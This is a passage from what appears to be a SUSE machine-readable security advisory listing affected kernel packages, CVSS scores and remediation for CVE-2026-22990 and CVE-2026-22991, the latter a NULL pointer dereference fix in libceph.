"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
